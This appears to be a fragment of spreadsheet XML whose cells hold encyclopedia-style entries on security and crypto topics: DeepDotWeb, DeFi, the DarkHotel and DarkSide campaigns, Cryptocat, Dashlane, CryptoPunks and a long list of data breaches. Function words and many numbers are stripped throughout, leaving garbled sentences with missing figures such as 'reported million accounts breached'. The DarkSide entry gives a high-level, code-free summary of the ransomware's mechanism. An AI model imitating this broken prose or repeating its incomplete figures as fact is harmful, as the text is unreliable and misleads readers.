replacement windows vista. campaigns tagging campaign since 2007, defective design site encourages users tagging feature amazon.com, slashdot sites allow tagging, mark certain products 'defectivebydesign' tag. items targeted include players, drm-restricted titles, blu-ray disc titles, windows higher, zune, ipod. #cancelnetflix campaign 2013, defective design site started tagging campaign netflix, online commercial stream service developed implementations web, challenge w3c's decision introducing technologies. despite popularity campaign, showed greenlight drm. also broadcast protection discussion group free software foundation anti-windows campaigns hardware restrictions planned obsolescence tivoization trusted computing references external links official website stallman, richard (nov 2016). "can trust computer?". essay.</t>
  </si>
  <si>
    <t>DeepDotWeb</t>
  </si>
  <si>
    <t>deepdotweb news site dedicated events surrounding dark featuring interviews reviews darknet markets, hidden services, privacy, bitcoin, related news. website seized 2019, investigation owners' affiliate marketing model, received money posting links certain darknet markets, charged conspiracy commit money laundering. march 2021 site administrator prihar pleaded guilty charge conspiracy commit money laundering. coverage included darknet market drug busts, pedophile crowdfunding, details hacking darknet markets, well diversification markets therealdeal selling software exploits.site features include blacklisted markets, comparisons, reviews. 2015, mcafee covered free ransomware-as-a-service called 'tox' hosted somewhere dark whose developers gave interview deepdotweb. domain seizure 2019, deepdotweb.com sister .onion domain redirected domain seizure notice. notice presented prominently displayed logos europol numerous affiliate enforcement agencies, including british national crime agency german bundeskriminalamt. israeli police alleged owners deepdotweb receiving bitcoin exchange links black market sites deep web. criminal charges 2019 site owners, prihar michael phan indicted united states court, charge conspiracy commit money laundering. according united states department justice, deepdotweb received $8.4 million kickbacks purchases fentanyl, firearms, hacking tools, contraband darknet marketplaces, transferred personal wallets using shell companies. according department justice, deepdotweb operation total 23.6 percent orders completed alphabay involved deepdotweb. march 2021 site administrator prihar pleaded guilty charge conspiracy commit money laundering.in january 2022, site administrator prihar sentenced months prison money laundering. ordered forefit $8.4 million. also dread, dark discussion forum references</t>
  </si>
  <si>
    <t>Decentralized finance</t>
  </si>
  <si>
    <t>decentralized finance (defi) offers financial instruments without relying intermediaries brokerages, exchanges, banks using smart contracts blockchain. defi platforms allow people lend borrow funds others, speculate price movements assets using derivatives, trade cryptocurrencies, insure risks, earn interest savings-like accounts. defi uses layered architecture highly composable building blocks. some applications promote high interest rates subject high risk. history decentralized exchanges (abbreviated dexs) alternative payment ecosystems protocols financial transactions emerged within framework decentralized finance, part blockchain technology fintech. unlike centralized cryptocurrency exchanges (cexs), coinbase, huobi binance, order books match buyers sellers open market keep crypto assets exchange-based wallet, dexs non-custodial leverage functionality self-executing smart contracts peer-to-peer trading, users retain control private keys funds.most recently, aggregators begun play distinctive part segment. aggregators form user-centric hubs compose several applications protocols, also providing tools compare rate services, allow users perform otherwise complex tasks connecting several protocols simultaneously. cexs, dexs aggregators built multi-layered defi architecture components, layer serves well-defined purpose. (see figure: multi-layered architecture defi stack). while share common components first four layers, settlement layer, asset layer, protocol layer application layer, aggregators additional component aggregator layer, allows connect interact dexs smart contracts.the ethereum blockchain popularized smart contracts, basis defi, 2017. other blockchains since implemented smart contracts. makerdao prominent lending defi platform based stablecoin established 2017. allows users borrow dai, token pegged dollar. through smart contracts govern loan, repayment, liquidation processes, makerdao aims maintain stable value decentralized autonomous manner.in june 2020, compound finance started rewarding lenders borrowers cryptocurrencies, addition typical interest payments lenders, units cryptocurrency called comp. this token, used running compound, also traded cryptocurrency exchanges. other platforms followed suit, leading "yield farming" "liquidity mining," speculators shift cryptocurrency assets pools platform platforms maximize total yield, includes interest fees also value additional tokens received rewards.in july 2020, washington post described decentralized finance techniques risks involved. september 2020, bloomberg said defi made two-thirds cryptocurrency market terms price changes defi collateral levels reached billion. ethereum rise developers 2020 increased interest defi.defi attracted venture capitalists andreessen horowitz michael novogratz.the economist regarded future digital finance 2022 "three-way fight" between: tech, facebook digital wallet; "big rich countries" testing digital currencies; software developers "building sorts applications" decentralise finance. handling risks presented crypto-assets already valued $2.5 trillion particular challenge regulators. characteristics defi revolves around decentralized applications, also known dapps, perform financial functions distributed ledgers called blockchains, technology made popular bitcoin since adapted broadly. rather transactions made centralized intermediary cryptocurrency exchange traditional securities exchange, transactions directly made participants, mediated smart contract programs. these smart contracts, defi protocols, typically using open-source software built maintained community developers.dapps typically accessed browser extension application. example, metamask allows users directly interact ethereum digital wallet. many dapps linked create complex financial services. example, stablecoin holders lend assets like coin liquidity pool borrow/lending protocol like aave, allow others borrow digital assets depositing collateral. protocol automatically adjusts interest rates based demand asset. some dapps source external (off-chain) data, price asset, blockchain oracles.additionally, aave introduced "flash loans", uncollateralized loans arbitrary amount taken paid back within single blockchain transaction. many exploits defi platforms used flash loans manipulate cryptocurrency spot prices.another defi protocol uniswap, decentralized exchange (dex) trade tokens issued ethereum. rather using centralized exchange fill orders, uniswap pays users form liquidity pools exchange percentage fees traders earn swapping tokens liquidity pools. because centralized party runs uniswap (the platform governed users), development team open-source software, entity check identities people using platform meet kyc/aml regulations. clear position regulators take legality platforms. decentralized exchanges decentralized exchanges (dex) type cryptocurrency exchange allows direct peer-to-peer cryptocurrency transactions take place online securely without need intermediary. transactions made decentralized exchanges, typical third party entities would normally oversee security transfer assets (e.g. banks, stockbrokers, online payment gateways, government institutions, etc.) substituted blockchain distributed ledger. some common methods operation include smart contracts order book relaying, although many variations possible differing degrees decentralization.because traders decentralized exchange often need transfer assets exchange executing trade, decentralized exchanges reduce risk theft hacking exchanges, liquidity providers need transfer tokens decentralized exchange. decentralized exchanges also prevent price manipulation faked trading volume wash trading, anonymous exchanges implement know customer (kyc) requirements. there signs decentralized exchanges suffering trading volumes market liquidity. project, protocol building decentralized exchanges interchangeable liquidity attempts solve issue. drawbacks lack processes, revert transaction, users loss ever hacked passwords private keys.additionally, users staking defi protocols suffer called impermanent loss. although liquidity pool widely used, drawbacks. common problems liquidity pool dexes price slippage front running. price slippage occurs (automated market makers) nature larger deal, stronger impact price. example, constant product use, every deal must keep product constant, quantities cryptocurrencies tokens) pool. larger input amount lower final ratio gives exchange price. problem mostly significant large deals small liquidity pools. front running special type attack public blockchains participant (usually miner) seeing upcoming trading transaction puts transaction ahead (playing transaction example), making initial transaction less profitable even reverted. ideas improving front running resistance constant product first discussed post vitalik buterin. degrees decentralization decentralized exchange still centralized components, whereby control exchange still hands central authority. notable example idex blocking york state users placing orders platform.in july 2018, decentralized exchange bancor reportedly hacked suffered loss $13.5m assets freezing funds. tweet, charlie lee, creator litecoin spoke claimed exchange cannot decentralized lose freeze customer funds.operators decentralized exchanges face legal consequences government regulators. example founder etherdelta, november 2018 settled charges u.s. securities exchange commission operating unregistered securities exchange. errors hacking coding errors hacks common defi. blockchain transactions irreversible, means incorrect fraudulent defi transaction cannot corrected easily. example, 2020, platform known finance took deposits equivalent $750 million within days launch crashing coding error.the person entity behind defi protocol unknown, disappear investors' money. investor michael novogratz described defi protocols "ponzi-like".defi compared initial coin offering craze 2017, part cryptocurrency bubble. inexperienced investors particular risk losing money sophistication required interact defi platforms lack intermediary customer support. hand, code defi smart contracts generally open-source software copied competing platforms, experienced users user-created bots might create instabilities funds shift platforms share code. addition, defi platforms might inadvertently provide incentives cryptocurrency miners destabilize system. 2021, half cryptocurrency crime related defi. this rise attributed combination developer incompetence non-existent poorly enforced regulations. theft defi come either external hackers stealing vulnerable projects, "rug pulls", developers influencers promote project take money, form pump-and-dump. also global financial system blockchain cryptocurrency wallet decentralized exchange references</t>
  </si>
  <si>
    <t>DarkHotel</t>
  </si>
  <si>
    <t>darkhotel darkhotel) targeted spear-phishing spyware malware-spreading campaign appears selectively attacking business hotel visitors hotel's in-house wifi network. characterized kaspersky advanced persistent threat.the attacks specifically targeted senior company executives, using forged digital certificates, generated factoring underlying weak public keys real certificates, convince victims prompted software downloads valid.uploading malicious code hotel servers, attackers able target specific users guests luxury hotels primarily asia united states. zetter (2014) explains group, dubbed darkhotel tapaoux, also actively infecting users spear-phishing peer-to-peer networks since 2007 using attacks load logging reverse engineering tools onto infected endpoints.targets aimed primarily executives investments development, government agencies, defense industries, electronic manufacturers energy policy makers. many victims located korea, china, russia japan.once attackers victim's computer(s), sensitive information passwords intellectual property quickly stolen attackers erase tools hopes getting caught order keep high level victims resetting passwords accounts.in july 2017 bitdefender published research inexsmar, another version darkhotel malware, used target political figures instead business targets. references</t>
  </si>
  <si>
    <t>DarkSide (hacker group)</t>
  </si>
  <si>
    <t>darkside cybercriminal hacking group, believed based eastern europe, targets victims using ransomware extortion; believed behind colonial pipeline cyberattack recent attack toshiba unit. group provides ransomware service.darkside claims apolitical. targets darkside believed based eastern europe, likely russia, unlike hacking groups responsible high-profile cyberattacks believed directly state-sponsored (i.e., operated russian intelligence services). darkside avoids targets certain geographic locations checking system language settings. addition languages current, former, founding countries exclusion list contains syrian arabic. experts state group "one many for-profit ransomware groups proliferated thrived russia" least implicit sanction russian authorities, allow activity occur long attacks foreign targets. language check feature disabled instance ransomware built. version observed 2021. additionally, darkside target healthcare centers, schools, non-profit organizations.ransomware code used darkside resembles ransomware software used revil, different hacking group; revil's code publicly available, suggesting darkside offshoot revil partner revil. darkside revil similarly structured ransom notes code check victim located commonwealth independent states (cis) country.according trend micro research data, united states darkside's targeted country, detections, followed france, belgium, canada. countries observed mcafee affected darkside attacks terms number devices impacted million devices israel (1573.28), malaysia (130.99), belgium (106.93), chile (103.97), italy (95.91), turkey (66.82), austria (61.19), ukraine (56.09), peru (26.94), u.s. (24.67).as june 2021, darkside published data company; amount data published exceeds mechanism attack darkside ransomware initially bypasses using cmstplua interface. software checks system's location language avoid machines former soviet countries; list languages excluded russian, ukrainian, belarusian, tajik, armenian, azerbaijani, georgian, kazakh, kyrgyz, turkmen, uzbek, tatar, moldovan romanian, syrian arabic.the software creates file named log.{userid}.txt, serves file. software deletes files recycle one, uninstalls certain security backup software programs, terminates processes allow access user data files. during encryption process proper, user generated based address appear appended filenames, file data encrypted salsa20 randomly generated matrix (which, encrypted hardcoded key, appended file). however, software avoids encrypting certain folders, files, filetypes.finally, ransomware leaves behind ransom note titled readme.{userid}.txt, directs user access site tor; site prompts user verify identity make payment using bitcoin monero. business model darkside uses intermediary hackers 26c3weq ("affiliates"). uses "ransomware-as-a-service" model darkside grants "affiliate" subscribers (who screened interview) access ransomware developed darkside, return giving darkside share ransom payments (apparently ransom payments us$500,000 ransom payments us$5 million). affiliates given access administration panel create builds specific victims. panel allows degree customization ransomware build. cybersecurity firm mandiant, subsidiary fireeye, documented five clusters threat activity represent different affiliates darkside raas platform, described three them, referred unc2628, unc2659, unc2465. history attacks 2020 august october group first noticed august 2020. cybersecurity company kaspersky described group "enterprise" professional-looking website attempts partner journalists decryption companies. group "has publicly stated prefer target organizations afford large ransoms instead hospitals, schools, non-profits, governments." group sought foster "robin hood" image, claiming donated ransom proceeds charity. darkweb post, group posted receipts donations 0.88 (then worth us$10,000) children international water project dated october 2020; children international stated keep money. 2020 2021 december from december 2020 2021, ransoms demanded group ranged us$200,000 us$2 million. darkside attacked u.s. infrastructure four occasions. darkside ransomware managed services provider compucom march 2021, costing us$20 million restoration expenses; also attacked canadian discount truck rentals toshiba corp., unit toshiba corp. darkside extorted money german company brenntag. cryptocurrency security firm elliptic stated bitcoin wallet opened darkside march 2021 received us$17.5 million bitcoin wallets (including colonial pipeline ransom), indicating number ransoms received course months. elliptic's analysis showed total, darkside received million ransom payments least victims. average ransom payment $1.9 million. 2021 federal bureau investigation identified darkside perpetrator colonial pipeline ransomware attack, cyberattack 2021, perpetrated malicious code, voluntary shutdown main pipeline supplying fuel east coast united states. attack described worst cyberattack date u.s. critical infrastructure. darkside successfully extorted bitcoin (almost us$5 million) colonial pipeline. u.s. officials investigating whether attack purely criminal took place involvement russian government another state sponsor. following attack, darkside posted statement claiming apolitical, participate geopolitics...our goal make money creating problems society."in 2021, cybersecurity infrastructure security agency issued joint alert urging owners operators critical infrastructure take certain steps reduce vulnerability darkside ransomware ransomware general.on 2021, russian-language statement obtained cybersecurity firms recorded future, fireeye, intel reported wall street journal york times, darkside said "due pressure u.s." shutting operations, closing gang's "affiliate program" (the intermediary hackers darkside works hack). specific "pressure" referred clear, preceding day, u.s. president biden suggested u.s. would take action darkside "disrupt ability operate." darkside claimed lost access payment server, blog, funds withdrawn unspecified account. cybersecurity experts cautioned darkside's claim disbanded might ruse deflect scrutiny, possibly allow gang resume hacking activities different name. common cybercriminal networks shut down, revive, rebrand way.agence france-presse reporters discovered recorded future report detailed loss darkside servers funds retweeted twitter account 780th military intelligence brigade, army cyberwarfare group involved offensive operations. references</t>
  </si>
  <si>
    <t>Cryptocat</t>
  </si>
  <si>
    <t>cryptocat discontinued open-source desktop application intended allow encrypted online chatting available windows, linux. uses end-to-end encryption secure communications cryptocat users. users given option independently verifying buddies' device lists notified buddy's device list modified updates verified built-in update downloader.cryptocat created nadim kobeissi developed along community open source contributors published terms gplv3 license, although since discontinued. history cryptocat first launched 2011 application. june 2012, kobeissi said detained u.s. border questioned cryptocat's censorship resistance. tweeted incident afterwards, resulting media coverage spike popularity software.in june 2013, security researcher steve thomas pointed security could used decrypt group chat message taken place using cryptocat september 2012 april 2013. private messages affected, resolved month before. response, cryptocat issued security advisory, requested users ensure upgraded, informed users past group conversations compromised.in february 2014, audit isec partners criticized cryptocat's authentication model insufficient. response, cryptocat made improvements user authentication, making easier users authenticate detect man-in-the-middle attacks.in february 2016, citing dissatisfaction project's current state months non-maintenance, kobeissi announced would taking cryptocat temporarily offline discontinuing development mobile application, pending complete rewrite relaunch software. march 2016 kobeissi announced re-release cryptocat, rewritten completely desktop software instead original application software, public beta resumption service. desktop-centric approach allowed cryptocat benefit stronger desktop integration, style similar pidgin. february 2019, announced cryptocat would discontinued. december 2019, cryptocat domain sale links site wire messenger. features cryptocat allows users end-to-end encrypted chat conversations. users exchange one-to-one messages, encrypted files, photos well create share audio/video recordings. devices linked cryptocat accounts receive forward secure messages, even offline. messages, files audio/video recordings sent cryptocat end-to-end encrypted. cryptocat users link devices cryptocat account upon connection, identify other's devices client's device manager order prevent man-in-the-middle attacks. cryptocat also employs trust first mechanism order help detect device identity changes. cryptocat also includes built-in auto-update mechanism automatically performs signature check downloaded updates order verify authenticity, employs certificate pinning order prevent network impersonation attacks. originally 2013, cryptocat offered ability connect facebook messenger initiate encrypted chatting cryptocat users. according developers, feature meant help offer alternative regular cryptocat chat model offer long-term contact lists. this feature disconnected november 2015. reception usage june 2013, cryptocat used journalist glenn greenwald hong kong meet whistleblower edward snowden first time, encryption software failed work.in november 2013, cryptocat banned iran, shortly election iran's president hassan rouhani promised open internet laws.cryptocat listed electronic frontier foundation's "secure messaging scorecard" november 2014 march 2016. during time, cryptocat score points scorecard. received points communications encrypted transit, communications encrypted keys provider access (end-to-end encryption), making possible users independently verify correspondent's identities, past communications secure keys stolen (forward secrecy), code open independent review (open-source), security designs well-documented, completed independent security audit. architecture encryption cryptocat uses double ratchet algorithm order obtain forward future secrecy across messages, session established using four-way elliptic-curve diffie–hellman handshake. handshake mixes long-term identity keys, intermediate-term signed pre-key, one-time prekey. approach similar encryption protocol adopted encrypted messaging signal mobile application. cryptocat's goal messages obtain confidentiality, integrity, source authenticity, forward future secrecy indistinguishability even network controlled active attacker. forward secrecy features protocol cryptocat uses similar first introduced off-the-record messaging. cryptocat uses advanced encryption standard galois/counter mode authenticated encryption, curve25519 elliptic curve diffie-hellman shared secret agreement, hmac-sha256 derivation ed25519 signing. order limit effect long-term identity compromise, long-term keys used exclusively initial authenticated exchange, signing newly generated intermediate-term signed prekey. transport layer, cryptocat adopts omemo multi-end message object encryption standard, also gives cryptocat multi-device support allows offline messaging. network cryptocat's network relies xmpp configuration served websockets. according project's mission statement, cryptocat's network relays encrypted messages store data. addition cryptocat client's end-to-end encryption protocol, client-server communication protected tls. distribution from march 2011 march 2016, cryptocat officially distributed google chrome store, apple store official channels controlled targeted platforms. after cryptocat's re-write desktop software march 2016, software became distributed exclusively cryptocat's servers, also handle signed update delivery. also comparison instant messaging clients freedom information project hacktivism internet privacy references further reading greenberg, andy 2011). "crypto.cat aims offer super-simple encrypted messaging". forbes. curtis, christopher february 2012). "free encryption software cryptocat protects right privacy: inventor". montréal gazette. archived original february 2012. dwyer, april 2012). "using software skills with freedom, payout, mind". york times. knowles, jamillah march 2012). "raspberry network plan online free-speech role". news. kirk, jeremy march 2012). "cryptocat aims easy-to-use encrypted chat". pcworld. archived original december 2012. external links official website cryptocat github</t>
  </si>
  <si>
    <t>Dashlane</t>
  </si>
  <si>
    <t>dashlane subscription-based password manager digital wallet application available macos, windows, android. dashlane uses freemium pricing model. overview dashlane founded july 2009, releasing first software 2012, first included password manager (encrypted using aes-256), walled behind single master password. over time, features introduced product multi-factor authentication automatic form filling password generation digital wallet security breach alert virtual private network also list password managers cryptography references external links official website</t>
  </si>
  <si>
    <t>CryptoPunks</t>
  </si>
  <si>
    <t>cryptopunks non-fungible token (nft) collection ethereum blockchain. project launched june 2017 larva labs studio, two-person team consisting canadian software developers matt hall john watkinson. experimental project inspired london punk scenes, cyberpunk movement, electronic music artists daft punk. crypto blockchain project inspiration erc-721 standard nfts modern crypto movement, since become part cryptocurrency decentralized finance ecosystems multiple blockchains. cryptopunks commonly credited starting craze 2021, along early projects including cryptokitties, bored yacht club, sale beeple's everydays: first 5000 days. there 10,000 cryptopunk tokens contracts. rarity exclusivity, sell higher prices open market sold using auction houses like christie's. march 2022, anonymous user donated cryptopunk #5364 ukraine's government ethereum wallet public address help funding ukrainian government russian invasion ukraine.on march 2022 announced cryptopunks acquired yuga labs (parent company creators bored yacht club project) undisclosed sum. immediately, yuga labs announced giving full commercial rights cryptopunks owners. 2022 transfer completed, whole cryptopunks marketplace moved yuga labs owned website. concept there 10,000 unique cryptopunks (6,039 male 3,840 female), made digitally scarce blockchain technology. each algorithmically generated computer code thus characters exactly alike, traits rarer others. they originally released free could claimed anyone ethereum wallet. costs claim cryptopunk initial release ethereum (eth) "gas fees", time, negligible little ethereum blockchain little knowledge project well.certain traits types characters rarer others. while many projects recent development often sample hundreds possible traits, cryptopunks project complex. most 10,000 total punks humans, also three special types: zombie (88), (24), alien (9). aside character type, potential additional attributes. controversies flash loan october 2021, single transaction made 124,457 ether ($532 million time sale) regarding cryptopunk #9998, much higher previous sales, leading speculation social media could kind scam, security exploit money laundering. larva labs said purchase made flash loan nft's owner bought item borrowed money, taking repaying loan within single blockchain transaction, subsequently invalidating sale asset's historic related statistics. sotheby's cryptopunks auction early 2022, sotheby's auction single cryptopunks announced. auction took place february 2022, seller (0x650d) changed mind minutes auction began decided withdraw auction keep whole lot. also rare pepe etherrock bored list expensive non-fungible tokens references external links official website</t>
  </si>
  <si>
    <t>Data breach</t>
  </si>
  <si>
    <t>data breach security violation, sensitive, protected confidential data copied, transmitted, viewed, stolen used individual unauthorized other terms unintentional information disclosure, data leak, information leakage data spill. incidents range concerted attacks individuals hack personal gain malice (black hats), organized crime, political activists national governments, poorly configured system security careless disposal used computer equipment data storage media. leaked information range matters compromising national security, information actions government official considers embarrassing wants conceal. deliberate data breach person privy information, typically political purposes, often described "leak".data breaches involve financial information credit card debit card details, bank details, personal health information (phi), personally identifiable information (pii), trade secrets corporations intellectual property. data breaches involve overexposed vulnerable unstructured data files, documents, sensitive information.data breaches quite costly organizations direct costs (remediation, investigation, etc) indirect costs (reputational damages, providing cyber security victims compromised data, etc.). according nonprofit consumer organization privacy rights clearinghouse, total 227,052,199 individual records containing sensitive personal information involved security breaches united states january 2005 2008, excluding incidents sensitive data apparently actually exposed.many jurisdictions passed data breach notification laws, requires company subject data breach inform customers take steps remediate possible injuries. definition data breach include incidents theft loss digital media computer tapes, hard drives, laptop computers unencrypted information, posting information world wide without proper information security precautions, transfer information system completely open appropriately formally accredited security, unencrypted e-mail, transfer information information systems possibly hostile agency, competing corporation foreign nation, exposed intensive decryption techniques.iso/iec 27040 defines data breach compromise security leads accidental unlawful destruction, loss, alteration, unauthorized disclosure access protected data transmitted, stored otherwise processed. trust privacy notion trusted environment somewhat fluid. departure trusted staff member access sensitive information become data breach staff member retains access data termination trust relationship. distributed systems, also occur breakdown trust. data quality reducing risk data breach, partly allows owner data rate data according importance give better protection important data. most incidents publicized media involve private information individuals, e.g. social security numbers. loss corporate information trade secrets, sensitive corporate information, details contracts, government information frequently unreported, compelling reason absence potential damage private citizens, publicity around event damaging loss data itself. insider versus external threats those working inside organization significant cause data breaches. estimates breaches caused accidental "human factor" errors around verizon 2021 data breach investigations report. external threat category includes hackers, cybercriminal organizations state-sponsored actors. professional associations asset managers work aggressively professionals educate best risk-reduction practices internal external threats assets, software information. while security prevention deflect high percentage attempts, ultimately motivated attacker likely find given network. quotes cisco john chambers "there types companies: hacked, know hacked." special agent cyber special operations taddeo warned bloomberg television, "the notion protect perimeter falling wayside detection critical." medical data breach some celebrities found victims inappropriate medical record access breaches, albeit individual basis, part typically much larger breach. given series medical data breaches lack public trust, countries enacted laws requiring safeguards place protect security confidentiality medical information shared electronically give patients important rights monitor medical records receive notification loss unauthorized acquisition health information. united states imposed mandatory medical data breach notifications. reportable breaches medical information increasingly common united states. consequences although incidents pose risk identity theft serious consequences, cases lasting damage; either breach security remedied information accessed unscrupulous people, thief interested hardware stolen, data contains. nevertheless, incidents become publicly known, customary offending party attempt mitigate damages providing victim's subscription credit reporting agency, instance, credit cards, instruments. case target, 2013 breach cost target significant drop profit, dove estimated percent quarter year. 2015, target published report claiming total loss $290 million data breach related fees.the yahoo breach disclosed 2016 expensive today. lower price acquisition verizon billion. verizon later released renegotiation yahoo agreeing lower final price $4.8 $4.48 billion. cybercrime cost energy utilities companies average $12.8 million year lost business damaged equipment according international certification body classification society based norway. data breaches cost healthcare organizations $6.2 billion last years (presumably 2014 2015), according ponemon study.in health care, million people health care stolen, resulting identity theft million people, out-of-pocket cost victims close billion. privacy rights clearinghouse (prc) shown records january 2005 december 2018 9000 breaches events. also, causes lead breach insider attack, payment card fraud, lost stolen portable device, infected malware sending email wrong person (disc). this shows many common mistake leads data breach humans make mistakes allowing hackers exploit perform attack.it notoriously difficult obtain information direct indirect value loss resulting data breach. common approach assess impact data breaches study market reaction incident proxy economic consequences. this typically conducted event studies, measure event's economic impact constructed using security prices observed relatively short period time. several studies studies published varying findings, including works kannan, rees, sridhar (2007), cavusoglu, mishra, raghunathan (2004), campbell, gordon, loeb, (2003) well schatz bashroush (2017).since data volume growing exponentially digital data leaks happen frequently ever before, preventing sensitive information leaked unauthorized parties becomes pressing security concerns enterprises. safeguard data finances, businesses companies often additional costs take preventive measure potential data breaches. from 2017 2021, predicted global spending internet security trillion. major incidents notable incidents include: 2005 ameriprise financial, stolen laptop, december 260,000 customer records choicepoint, february, 163,000 consumer records 2006 search data scandal (sometimes referred "data valdez", size) department veterans affairs, may, 28,600,000 veterans, reserves, active duty military personnel ernst young, may, 234,000 customers hotels.com (after similar loss data 38,000 employees ernst young clients february) boeing, december, 382,000 employees (after similar losses data 3,600 employees april 161,000 employees november, 2005) 2007 davidson 192,000 clients' names, customer account social security numbers, addresses dates birth 2007 loss ohio connecticut state data accenture maxx, data million credit debit accounts 2007 child benefit data scandal group, august, 283,000 retirees york city gap, september, 800,000 applicants memorial blood center, december, 268,000 blood donors davidson county election commission, december, 337,000 voters 2008 january 2008, money, division general electric, disclosed magnetic tape containing 150,000 social security numbers in-store credit card information 650,000 retail customers known missing iron mountain incorporated storage facility. j.c. penney among retailers affected. horizon blue cross blue shield jersey, january, 300,000 members lifeblood, february, 321,000 blood donors british national party membership list leak early 2008, countrywide financial (since acquired bank america) allegedly fell victim data breach when, according news reports court documents, employee rene rebollo stole sold million customers' personal information including social security numbers. according legal complaint: "beginning 2008 coincidentally sold mortgage portfolios wrongful fraudulent 'securitization pools,' coincidentally mortgage portfolio went massive default result thereof countrywide learned financial information potentially millions customers stolen certain countrywide agents, employees individuals." july 2010, bank america settled related class-action lawsuits offering free credit monitoring, identity theft insurance reimbursement losses many million consumers impacted alleged data breach. settlement estimated $56.5 million including court costs. 2009 december 2009 rockyou! password database breached containing million usernames plaintext passwords, compromising weak passwords purpose. 2009 united kingdom parliamentary expenses scandal revealed daily telegraph. hard disk containing scanned receipts members parliament peers house lords offered various newspapers late april, daily telegraph finally acquiring they published details instalments onwards. although intended parliament data published, redacted form, details individual members considered "sensitive" blanked out. newspaper published unredacted scans showed details claims, many appeared breach rules suggested widespread abuse generous expenses system. resulting media storm resignation speaker house commons prosecution imprisonment several lords fraud. expenses system overhauled tightened private industry schemes. metropolitan police service continues investigate possible frauds, crown prosecution service considering prosecutions. several lords apologised made whole, partial restitution, retained seats. others shamed media offer re-election 2010 united kingdom general election. although numbering less 1,500 individuals, affair received largest global media coverage data breach february 2012). january 2009 heartland payment systems announced "the victim security breach within processing system", possibly part "global cyber fraud operation". intrusion called largest criminal breach card data ever, estimates million cards financial services companies compromised. 2010 throughout year, chelsea manning released large volumes secret military data public. 2011 april 2011, sony experienced data breach within playstation network. estimated information million users compromised. march 2011, securid suffered breach securid token system seed-key warehouse, seed keys factor authentication system stolen, allowing attackers replicate hardware tokens used secure access corporate government environments. june 2011, citigroup disclosed data breach within credit card operation, affecting approximately 210,000 customers' accounts. 2012 summer 2012, wired.com senior writer honan claims "hackers destroyed entire digital life span hour” hacking apple, twitter, gmail passwords order gain access twitter handle process, claims hackers wiped every devices, deleting messages documents, including every picture ever taken 18-month-old daughter. exploit achieved combination information provided hackers amazon's tech support social engineering, password recovery system apple used information. related experience, honan wrote piece outlining passwords cannot keep users safe. october 2012, enforcement agency contacted south carolina department revenue (dor) evidence personally identifiable information (pii) three individuals stolen. later reported estimated million social security numbers compromised along 387,000 credit card records. 2013 october 2013, adobe systems revealed corporate database hacked million user records stolen. according adobe, "for year, adobe’s authentication system cryptographically hashed customer passwords using sha-256 algorithm, including salting passwords iterating hash 1,000 times. this system subject attack publicly disclosed october 2013. authentication system involved attack backup system designated decommissioned. system involved attack used triple encryption protect password information stored." late november early december 2013, target corporation announced data around million credit debit cards stolen. second largest credit debit card breach companies data breach almost million cards affected. 2013, edward snowden published series secret documents revealed widespread spying united states national security agency similar agencies countries. 2014 august 2014, nearly photographs celebrities stolen apple icloud accounts posted image board website 4chan. investigation apple found images obtained targeted attack user names, passwords security questions". however, apple toughened icloud security opt-in factor authentication, celebrity breach.[1] september 2014, home depot suffered data breach million credit card numbers. october 2014, staples suffered data breach 1.16 million customer payment cards. november 2014 weeks after, sony pictures entertainment suffered data breach involving personal information sony pictures employees families, e-mails employees, information executive salaries company, copies (previously) unreleased sony films, information. hackers involved claim taken terabytes data sony. 2015 october 2015, british telecommunications provider talktalk suffered data breach group 15-year-old hackers stole information million customers. stock price company fell substantially issue around owing largely publicity surrounding leak. july 2015, adult website ashley madison suffered data breach hacker group stole information million users. hackers threatened reveal usernames specifics ashley madison fellow site, establishedmen.com, shut permanently. february 2015, anthem suffered data breach nearly million records, including personal information names, social security numbers, dates birth, sensitive details. june 2015, office personnel management u.s. government suffered data breach records 22.1 million current former federal employees united states hacked stolen. 2016 february 2016, 15-year-old british hacker kane gamble leaked personal details 20,000 employees, including employees' names, titles, phone numbers email addresses. judge said gamble engaged "politically motivated cyber-terrorism." march 2016, vice reported teenage hacker cyber anakin gone hacking spree russian websites e-mail provider km.ru game company nival express anger russia downing malaysia airlines flight mh17 eastern ukraine. according cybersecurity researcher troy hunt, least million victims affected breaches. many years later latvia-based independent news website meduza used content km.ru's data breach pinpoint identity person harassing female chess players various countries russia, kazakhstan india delivery mails containing used condoms. march 2016, website commission elections philippines defaced hacktivist group, "anonymous philippines". larger problem arose group called lulzsec pilipinas uploaded comelec's entire database facebook following day. april 2016, news media carried information stolen successful network attack central american firm, mossack fonseca, resulting “panama papers” sent reverberations throughout world. perhaps justified vindication illegal unethical activity, nonetheless illustrates impact secrets coming light. prime minister iceland forced resign major reshuffling political offices occurred countries far-flung malta. multiple investigations immediately initiated countries around world, including hard look international offshore banking rules u.s. obviously implications enormous ability organization—whether firm governmental department—to keep secrets. september 2016 yahoo reported million accounts 2014 breached apparent "state-sponsored" data breach. later reported october 2017 billion accounts breached, accounting every yahoo account time. 2017 vault cia's hacking techniques revealed data breach. leaked documents, codenamed vault dated 2013–2016, detail capabilities perform electronic surveillance cyber warfare, ability compromise operating systems smartphones (including apple's google's android), well operating systems microsoft windows, macos, linux. joshua adam schulte, former employee, accused leaking hacking secrets wikileaks. equifax, july 2017, 145,500,000 consumer records, largest known data breach history time leading potential largest class action lawsuit history. early october 2017, cities chicago francisco commonwealth massachusetts filed enforcement actions equifax following july 2017 data breach, hackers allegedly exploited vulnerability open-source software used create equifax's online consumer dispute portal. hackers information u.s. residents also u.k. canadians well. united states-south korea classified military documents, october 2017. south korean lawmaker claimed north korean hackers stole gigabytes military documents defense integrated data center september 2016. leaked documents included south korea-u.s. wartime operational plans. paradise papers, november 2017. 2018 facebook cambridge analytica data scandal march. march, google identified vulnerability exposing personal information nearly half million users. while patched vulnerability, disclose exposure users issue reported wall street journal months fact. march, under armour disclosed data breach million accounts myfitnesspal, compromised data consisting user names, users' e-mail addresses hashed passwords. under armour notified breach week 19–25 march, leak happened sometime february. reported april data breach occurred saks fifth avenue lord taylor. about million credit card holders data compromised stores north america. reported july data breach singhealth, singapore's largest health organisations, happened july, million personal data (including data ministers, including singapore's prime minister hsien loong) compromised. ministers press conference dubbed data breach "most serious breach personal data". august, reddit disclosed hacked. hacker able compromise employees accounts even though used based two-factor authentication. reddit refused disclose number affected users. september reported british airways experienced data theft 380,000 customer records including full bank details. october centers medicare medicaid services (cms) reported data breach exposed files 75,000 individuals. december quora reported data breach affected million users data. late 2018, epic games fortnite game discovered security vulnerability would allowed attacker victims' payment card data. that breaches estimated stolen fortnite accounts illegally sold value million dollars year underground forums. class action lawsuit epic games forming 2019. 2019 may, personal data roughly million users graphic design service canva exposed, including real names users, usernames, addresses geographical information, password hashes. july 